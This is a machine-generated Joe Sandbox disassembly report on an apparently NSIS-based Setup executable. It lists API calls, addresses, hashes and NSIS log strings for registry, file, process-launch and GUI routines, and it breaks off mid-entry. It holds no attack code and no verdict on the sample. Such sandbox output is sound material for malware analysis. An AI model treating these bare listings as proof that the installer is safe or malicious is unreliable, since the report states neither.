                                                                  • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                  • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                  • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                  • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                  APIs
                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                  • DeleteObject.GDI32(?), ref: 004010F6
                                                                  • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                  • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                  • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                  • DeleteObject.GDI32(?), ref: 0040116E
                                                                  • EndPaint.USER32(?,?), ref: 00401177
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                  • String ID: F
                                                                  • API String ID: 941294808-1304234792
                                                                  • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                  • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                  • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                  • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                  APIs
                                                                  • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                  • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                  • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                  • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                  Strings
                                                                  • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                  • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                  • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                  • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                  • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                  • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                  Similarity
                                                                  • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                  • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                  • API String ID: 1641139501-220328614
                                                                  • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                  • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                  • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                  • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                  APIs
                                                                  • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                  • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                  • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                  • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                  • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                  • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                  • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                  • API String ID: 3734993849-3206598305
                                                                  • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                  • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                  • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                  • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                  APIs
                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                  • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                  • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                  • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                  Strings
                                                                  • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                  Similarity
                                                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                  • String ID: created uninstaller: %d, "%s"
                                                                  • API String ID: 3294113728-3145124454
                                                                  • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                  • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                  • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                  • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424179,759223A0,00000000), ref: 00404FD6
                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424179,759223A0,00000000), ref: 00404FE6
                                                                    • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424179,759223A0,00000000), ref: 00404FF9
                                                                    • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                  • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                  Strings
                                                                  • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                  • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                  • `G, xrefs: 0040246E
                                                                  • 8bd, xrefs: 00402473
                                                                  • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                  • String ID: 8bd$Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                  • API String ID: 1033533793-2017676009
                                                                  • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                  • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                  • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                  • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                  APIs
                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                  • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                  • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                  • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                  • GetSysColor.USER32(?), ref: 00403E57
                                                                  • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                  • DeleteObject.GDI32(?), ref: 00403E81
                                                                  • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                  • String ID:
                                                                  • API String ID: 2320649405-0
                                                                  • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                  • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                  • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                  • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                  APIs
                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424179,759223A0,00000000), ref: 00404FD6
                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424179,759223A0,00000000), ref: 00404FE6
                                                                    • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424179,759223A0,00000000), ref: 00404FF9
                                                                    • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                    • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                    • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                  • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                  Strings
                                                                  • Exec: command="%s", xrefs: 00402241
                                                                  • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                  • Exec: success ("%s"), xrefs: 00402263
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                  • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                  • API String ID: 2014279497-3433828417
                                                                  • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                  • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                  • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                  • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                  • GetMessagePos.USER32 ref: 0040489D
                                                                  • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: Message$Send$ClientScreen
                                                                  • String ID: f
                                                                  • API String ID: 41195575-1993550816
                                                                  • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                  • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                  • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                  • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                  APIs
                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                  • MulDiv.KERNEL32(00065600,00000064,046024A0), ref: 00403295
                                                                  • wsprintfW.USER32 ref: 004032A5
                                                                  • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                  Strings
                                                                  • verifying installer: %d%%, xrefs: 0040329F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                  • String ID: verifying installer: %d%%
                                                                  • API String ID: 1451636040-82062127
                                                                  • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                  • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                  • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                  • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                  APIs
                                                                  • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                  • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                  • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                  • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: Char$Next$Prev
                                                                  • String ID: *?|<>/":
                                                                  • API String ID: 589700163-165019052
                                                                  • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                  • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                  • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                  • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                  APIs
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: Close$DeleteEnumOpen
                                                                  • String ID:
                                                                  • API String ID: 1912718029-0
                                                                  APIs
                                                                  • GetDlgItem.USER32(?), ref: 004020A3
                                                                  • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                  • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                  • String ID:
                                                                  • API String ID: 1849352358-0
                                                                  APIs
                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Timeout
                                                                  • String ID: !
                                                                  • API String ID: 1777923405-2657877971
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                  • wsprintfW.USER32 ref: 00404483
                                                                  • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                  • String ID: %u.%u%s%s
                                                                  • API String ID: 3540041739-3551169577
                                                                  APIs
                                                                    • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                  • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                  Strings
                                                                  • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                  • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                  • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                  • API String ID: 1697273262-1764544995
                                                                  APIs
                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                    • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                    • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                  • lstrlenW.KERNEL32 ref: 004026B4
                                                                  • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                  • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                  • String ID: CopyFiles "%s"->"%s"
                                                                  • API String ID: 2577523808-3778932970
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
